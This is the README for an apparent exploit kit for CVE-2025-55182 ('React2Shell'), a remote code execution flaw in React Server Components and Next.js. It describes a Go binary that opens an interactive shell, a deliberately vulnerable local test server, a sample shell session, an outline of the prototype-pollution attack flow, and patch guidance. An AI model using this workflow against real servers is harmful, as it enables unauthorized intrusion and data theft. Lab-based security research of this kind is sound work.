Share
## https://sploitus.com/exploit?id=49D198A8-CB9E-5764-86F7-7D157A435A84
# CVE-2025-55182 (React2Shell) Exploit Kit

## ๐ŸŽฏ Complete Working Exploit Demonstration

This project provides a **fully functional** demonstration of CVE-2025-55182 (React2Shell) - a critical Remote Code Execution vulnerability in React Server Components and Next.js.

**Status:** โœ… **WORKING** - Achieves actual command execution on vulnerable servers

## ๐Ÿš€ What's Included

### Working Exploit Binary
- **Language:** Go 1.25.5
- **Binary:** `CVE-2025-55182` (7.8MB compiled executable)
- **Capabilities:** 
  - Interactive RCE shell on vulnerable Next.js servers
  - Built-in file operations (cat, vi, touch, echo, rm)
  - Command execution with output parsing
  - File reading, writing, and editing

### Vulnerable Test Server
- **Next.js:** 15.0.1 (deliberately vulnerable)
- **React:** 19.0.0 (deliberately vulnerable)
- **Server Actions:** Enabled
- **Port:** http://localhost:3001

## โœจ Quick Start

### 1. Start the Vulnerable Server

```bash
cd exploited-server
npm run dev
# Server starts on http://localhost:3001
```

### 2. Run the Exploit

```bash
cd /Users/subh/Desktop/code-playground/react-2-shell-demo
./CVE-2025-55182

# When prompted:
Target: localhost:3001
```

### 3. Execute Commands

**Basic Commands:**
```
subh@rce $ whoami
subh@rce $ pwd
subh@rce $ ls -la
subh@rce $ hostname
```

**File Operations:**
```
subh@rce $ touch hello.txt
[+] Created: hello.txt

subh@rce $ vi hello.txt
[i] Enter new content (type 'EOF' on a line by itself to finish):
Hello World!
EOF
[+] File saved: hello.txt

subh@rce $ cat hello.txt
Hello World!

subh@rce $ echo "New content" > hello.txt
[+] File written

subh@rce $ rm hello.txt
[+] Removed: hello.txt
```

**System Info:**
```
subh@rce $ cat package.json
subh@rce $ node --version
subh@rce $ npm --version
subh@rce $ ps aux
```

**Exit:**
```
subh@rce $ exit
```

## ๐Ÿ“‹ CVE-2025-55182 Details

- **CVE ID:** CVE-2025-55182
- **Name:** React2Shell
- **CVSS Score:** 10.0 (Critical)
- **Type:** Unauthenticated Remote Code Execution
- **Attack Vector:** Network
- **Affected:** React 19.0.0-19.2.0, Next.js 15.x-16.x with Server Actions

## ๐ŸŽ“ Educational Value

This project demonstrates:

โœ… **Real Exploitation** - Actual working RCE on vulnerable systems  
โœ… **Security Research** - Understanding modern web framework vulnerabilities  
โœ… **Go Development** - Compiling and using security tools  
โœ… **Vulnerability Analysis** - CVE research and exploitation techniques  
โœ… **Responsible Disclosure** - Ethical security testing practices  

## ๐Ÿ—๏ธ Project Structure

```
react-2-shell-demo/
โ”œโ”€โ”€ CVE-2025-55182           # Compiled Go exploit binary
โ”œโ”€โ”€ main.go                  # Go source code
โ”œโ”€โ”€ exploited-server/        # Vulnerable Next.js app
โ”‚   โ”œโ”€โ”€ app/
โ”‚   โ”‚   โ”œโ”€โ”€ actions.ts       # Server Actions (vulnerable)
โ”‚   โ”‚   โ””โ”€โ”€ page.tsx         # Warning UI
โ”‚   โ””โ”€โ”€ package.json         # Next 15.0.1, React 19.0.0
โ””โ”€โ”€ *.md                     # Documentation
```

## ๐ŸŽฏ How It Works

### The Vulnerability

CVE-2025-55182 exploits insecure deserialization in React Server Components:

1. **Attack Vector:** Malicious HTTP POST with crafted multipart payloads
2. **Exploitation:** Prototype pollution via `__proto__`
3. **Trigger:** Fake chunks that invoke `Function()` constructor
4. **Result:** Arbitrary code execution in Node.js context

### The Exploit Flow

```
1. Craft multipart payload with malicious chunks
2. Send to Next.js Server Actions endpoint
3. Trigger prototype pollution via __proto__:then
4. Invoke Function() constructor with command
5. Execute code and return output via redirect
6. Parse result from X-Action-Redirect header
```

## โš ๏ธ Security Warning

**CRITICAL NOTICES:**

- โ›” **Vulnerable server is INTENTIONAL** - Do not expose to internet
- โ›” **Use for authorized testing ONLY** - Illegal without permission
- โ›” **Educational purposes** - Security research and learning
- โ›” **Ethical use required** - Follow responsible disclosure

## ๐Ÿ“š Documentation

- [`README.md`](README.md) - This file
- [`GO_EXPLOIT_USAGE.md`](GO_EXPLOIT_USAGE.md) - Detailed exploit usage
- [`VULNERABLE_SERVER.md`](exploited-server/VULNERABLE_SERVER.md) - Server setup guide
- [`EXPLOITATION_GUIDE.md`](EXPLOITATION_GUIDE.md) - Technical deep dive
- [`USAGE.md`](USAGE.md) - Usage examples and commands

## ๐Ÿ”ง Requirements

- **Go:** 1.25+ (for compiling from source)
- **Node.js:** 18+ (for running vulnerable server)
- **npm:** Latest version
- **OS:** macOS, Linux, or Windows

## ๐ŸŽฏ Testing Workflow

1. โœ… **Setup vulnerable server** (`npm run dev` in exploited-server)
2. โœ… **Run exploit binary** (`./CVE-2025-55182`)
3. โœ… **Enter target** (localhost:3001)
4. โœ… **Get interactive shell** (subh@rce $)
5. โœ… **Execute commands** (whoami, ls, cat, etc.)
6. โœ… **Exit when done** (exit command)

## ๐ŸŒŸ Key Achievements

This project successfully demonstrates:

- โœ… **Working RCE exploit** against CVE-2025-55182
- โœ… **Interactive command shell** on vulnerable servers
- โœ… **Complete exploitation workflow** from setup to execution
- โœ… **Educational security research** with real-world tools
- โœ… **Responsible vulnerability testing** in controlled environment

## ๐Ÿ›ก๏ธ Mitigation

**For Production Systems:**

1. **Update immediately** to patched versions:
   - Next.js: 15.0.5+, 15.1.9+, 15.2.6+, 15.3.6+, 15.4.8+, 15.5.7+, 16.0.7+
   - React: 19.0.1+, 19.1.2+, 19.2.1+

2. **Rotate secrets** if exposed before December 4, 2025

3. **Monitor logs** for suspicious Server Actions activity

4. **Audit applications** using Server Components

## ๐Ÿ“– Learn More

- [CVE-2025-55182 Official Record](https://vulners.com/cve/CVE-2025-55182)
- [Next.js Security Advisory](https://nextjs.org/blog/security-nextjs-server-components-rce)
- [Wiz Research: React2Shell](https://www.wiz.io/blog/react2shell-critical-rce-in-react-server-components)

## ๐Ÿ‘จโ€๐Ÿ’ป Author

**@subhdotsol** - For educational and security research purposes

## ๐Ÿ“œ License

This code is for educational and authorized security testing only.

---

**Remember:** Always obtain proper authorization before testing. Use responsibly! ๐Ÿ”’